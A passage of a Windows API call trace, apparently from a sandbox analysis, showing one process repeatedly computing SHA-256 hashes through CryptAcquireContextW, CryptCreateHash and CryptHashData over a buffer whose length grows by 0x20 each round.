dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e75b10 [0175.915] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e75b10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e75b10, pdwDataLen=0xcdfdc) returned 1 [0175.915] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.915] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.915] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0175.916] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.916] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x400, dwFlags=0x0) returned 1 [0175.916] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.916] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e592a0 [0175.916] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e592a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e592a0, pdwDataLen=0xcdfdc) returned 1 [0175.916] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.916] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0175.916] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.916] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.916] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x420, dwFlags=0x0) returned 1 [0175.916] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.916] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69f90 [0175.916] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e69f90, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e69f90, pdwDataLen=0xcdfdc) returned 1 [0175.916] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.916] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.916] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0175.917] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.917] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x440, dwFlags=0x0) returned 1 [0175.917] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a680 [0175.917] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a680, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a680, pdwDataLen=0xcdfdc) returned 1 [0175.917] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.917] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0175.917] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.918] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.918] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x460, dwFlags=0x0) returned 1 [0175.918] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a140 [0175.918] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a140, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a140, pdwDataLen=0xcdfdc) returned 1 [0175.918] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.918] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.918] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0175.918] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.918] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x480, dwFlags=0x0) returned 1 [0175.918] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.918] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aa10 [0175.918] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6aa10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6aa10, pdwDataLen=0xcdfdc) returned 1 [0175.918] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.918] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0175.918] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0175.919] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.919] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0175.919] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.919] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a7d0 [0175.919] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a7d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a7d0, pdwDataLen=0xcdfdc) returned 1 [0175.919] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.919] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0175.919] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.920] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.920] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0175.920] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a410 [0175.920] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a410, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a410, pdwDataLen=0xcdfdc) returned 1 [0175.920] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.920] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.920] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.920] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.920] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0175.920] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.920] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a890 [0175.920] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a890, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a890, pdwDataLen=0xcdfdc) returned 1 [0175.920] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.920] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.920] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.921] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.921] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x500, dwFlags=0x0) returned 1 [0175.921] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.921] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a440 [0175.921] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a440, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a440, pdwDataLen=0xcdfdc) returned 1 [0175.921] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.921] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.921] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0175.921] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.921] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x520, dwFlags=0x0) returned 1 [0175.922] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a650 [0175.922] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a650, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a650, pdwDataLen=0xcdfdc) returned 1 [0175.922] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.922] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0175.922] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0175.922] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.922] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x540, dwFlags=0x0) returned 1 [0175.922] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.922] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a6e0 [0175.922] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a6e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a6e0, pdwDataLen=0xcdfdc) returned 1 [0175.922] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.922] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0175.922] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.923] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.923] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x560, dwFlags=0x0) returned 1 [0175.923] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.923] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a6b0 [0175.923] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e6a6b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a6b0, pdwDataLen=0xcdfdc) returned 1 [0175.923] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0175.923] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.923] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.923] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.923] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x580, dwFlags=0x0) returned 1 [0175.923] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a800 [0175.924] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a800, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a800, pdwDataLen=0xcdfdc) returned 1 [0175.924] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.924] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.924] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0175.924] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.924] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0175.924] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a500 [0175.925] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a500, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a500, pdwDataLen=0xcdfdc) returned 1 [0175.925] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.925] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0175.925] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0175.925] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.925] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0175.925] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.925] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a710 [0175.925] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a710, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a710, pdwDataLen=0xcdfdc) returned 1 [0175.925] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.925] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0175.925] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0175.926] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.926] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0175.926] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a2f0 [0175.926] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a2f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a2f0, pdwDataLen=0xcdfdc) returned 1 [0175.926] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.926] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0175.926] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.927] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.927] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x600, dwFlags=0x0) returned 1 [0175.927] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a590 [0175.927] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a590, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a590, pdwDataLen=0xcdfdc) returned 1 [0175.927] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.927] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.927] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0175.927] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.927] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x620, dwFlags=0x0) returned 1 [0175.927] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69ff0 [0175.927] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e69ff0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e69ff0, pdwDataLen=0xcdfdc) returned 1 [0175.927] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.927] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0175.927] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.928] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.928] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x640, dwFlags=0x0) returned 1 [0175.928] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.928] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a1a0 [0175.928] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a1a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a1a0, pdwDataLen=0xcdfdc) returned 1 [0175.928] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.928] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.928] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0175.929] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.929] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x660, dwFlags=0x0) returned 1 [0175.929] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a740 [0175.929] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a740, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a740, pdwDataLen=0xcdfdc) returned 1 [0175.929] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.929] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0175.929] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0175.929] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.929] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x680, dwFlags=0x0) returned 1 [0175.929] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a3b0 [0175.929] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e6a3b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a3b0, pdwDataLen=0xcdfdc) returned 1 [0175.929] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0175.929] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0175.929] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.930] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.930] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0175.930] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.930] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a5c0 [0175.930] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a5c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a5c0, pdwDataLen=0xcdfdc) returned 1 [0175.930] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.930] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.930] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0175.931] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.931] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0175.931] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a080 [0175.931] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a080, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a080, pdwDataLen=0xcdfdc) returned 1 [0175.931] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.931] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0175.931] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.931] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.931] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0175.931] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.931] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a0b0 [0175.931] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a0b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a0b0, pdwDataLen=0xcdfdc) returned 1 [0175.931] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.931] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.931] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, 